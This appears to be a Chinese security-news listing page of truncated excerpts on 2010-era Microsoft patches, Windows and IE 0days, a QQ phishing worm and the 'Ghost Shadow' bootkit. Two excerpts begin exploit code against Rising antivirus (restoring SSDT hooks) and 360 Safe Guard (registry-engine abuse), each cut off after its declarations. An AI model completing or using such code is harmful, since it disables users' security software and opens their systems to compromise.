微软今天发布了2010年7月安全公告，本次公告共包含5个更新，修复了来自Windows和Office的一系列漏洞，其中包括之前被披露的 Windows帮助中心漏洞，它可导致系统被黑客控制，并且网络上已经出现攻击代码。此外，微软还修复了Canonical Display Driver的整数溢出漏洞和Microsoft Outlook SMB附件等漏洞。 查看:Microsoft Security Bulletin Summary for July 2010 通过诱惑用户访问一个恶意网站，黑客可以利用Windows Help和Support Center中的一处缺陷控制用户的计算机。该缺陷对于Windows XP的危险程度评级是“危急”，对于Windows Server 2003为“低”。 微软今天发布的...

日前Windows  XP曝新0day漏洞，这是一个基于Windows系统帮助中心程序的0day漏洞，它是由于帮助中心程序进行格式处理时调用hcp协议的一个错误引起 的。攻击者利用这个漏洞可以在用户的电脑上执行任意一个已有程序，比如说一个木马。或者控制用户的浏览器去访问别的某些网址。     　　不过，广 大用户对这一0day漏洞不必过于恐慌，该漏洞仅影响Windows XP和Windows  2003，且目前的恶意代码只对IE6浏览器具有直接有效的攻击效果。如果您使用的是IE8，屏幕上会不可避免的弹出一个需要用户手工确认的提示框，除非您自己允许它运行， 否则恶意脚本无法跑起来。而这正是它...

72U是恶意手机病毒！这个病毒应该是23日0:00以后爆发的，而且专门针对于手机QQ用户。输入www。72ub。com网址，是一个号称测虎年运气的网站，并会自动转向新浪的一个名叫芟偙勒:fengyun的博客，页面上面列数了“用移动手机拨打125906586864参加身份验证，立马拿到二百圆话费，太棒了! ”的信息。如果你出于好奇，点击此网站，那就是大大的杯具了！这个挂马网站会自动修改你的QQ签名成“测你的虎年运势www。72ub。com我试了太准了！”，并以近似疯狂的手段向QQ好友或QQ群爆发性大量发送“上www 。72ub。cn有惊喜”的恶意消息。更大的杯具是，据零点研究了一晚上，有些杀毒或清...

经过了一两个月的平静期，微软有准备开始大规模发放补丁了，本月，11个影响Windows、Office、Exchange的安全公告将发布，它们将共同修复微软软件的25个漏洞，其中包括两个已经出现攻击代码的漏洞。    其中，5个安全公告被标记为“危急”，它们可以让攻击者直接控制计算机，其余7个分别评级为重要和一般。    本次更新影响Windows 2000, XP, Vista, Windows 7, Server 2003, Server 2008, Office XP, Office 2003, 2007 Microsoft Office System和Exchange Server 2000, 2003, 2007和 2010等诸多软件的多个版本，同日，Adobe也...

[Made By Migroom]某年某月某日我跟某位大牛在聊天的时候仿佛听到划时代的病毒。当然在新型病毒出现之前想必大家也考虑着如何防护。2006年在美国拉斯维加斯全球黑客大会（Blackhack）公布的基于Bios类型的木马病毒，确实了解相关信息后感觉是非常可怕的。近期发展的“鬼影”病毒也很类型恐怖。现在各个安全公司和技术人员都在研究此类病毒特征和源码。一、简介该病毒一旦进入电脑，就像恶魔一样，隐藏在系统之外，无文件、无系统启动项、无进程模块，比系统运行还早，结束所有杀毒软件，下载av终结者，盗号木马，ie主页修改等大量多品种病毒，最重要的是重装系统都不能...

瑞星近期不是也闹的沸沸扬扬嘛，什么乱七八糟的。。。利用代码：by Dlrow dlrow1991@ymail.com restore all ssdt hooks // Rising0day.cpp : Defines the entry point for the console application.//#include “stdafx.h”#include “windows.h”enum { SystemModuleInformation = 11 };typedef struct { ULONG Unknown1; ULONG Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256];} SYSTE...

360安全卫士也不过如此嘛。。。利用代码：#include typedef BOOL (WINAPI *INIT_REG_ENGINE)();typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData); BREG_DELETE_KEY BRegDeleteKey = NULL;BREG_OPEN_KEY BRegOpenKey = NULL;BREG_CLOSE_KEY BRegCloseKey = NUL...

　近日，全球多家安全厂商同时发布安全预警，公布了微软最新IE Dom 0day漏洞（极光零日漏洞）的相关信息。随着该漏洞信息的不断被披露，目前网上已经出现基于该漏洞的完整的恶意攻击代码。由于微软尚未发布此漏洞的安全补丁，一些企业和用户担心受到此漏洞的攻击。金山安全专家认为由于该漏洞触发概率很高，很可能在近期就会被大规模利用，并提醒广大网友注意防范。　　作为国内唯一的微软VIA联盟的成员，金山安全专家认为微软IE Dom 0day漏洞影响巨大，该漏洞已经被黑客利用，可被黑客用于大范围传播木马病毒，如果用户访问了包含该漏洞的网站，将面临严重安全威胁。...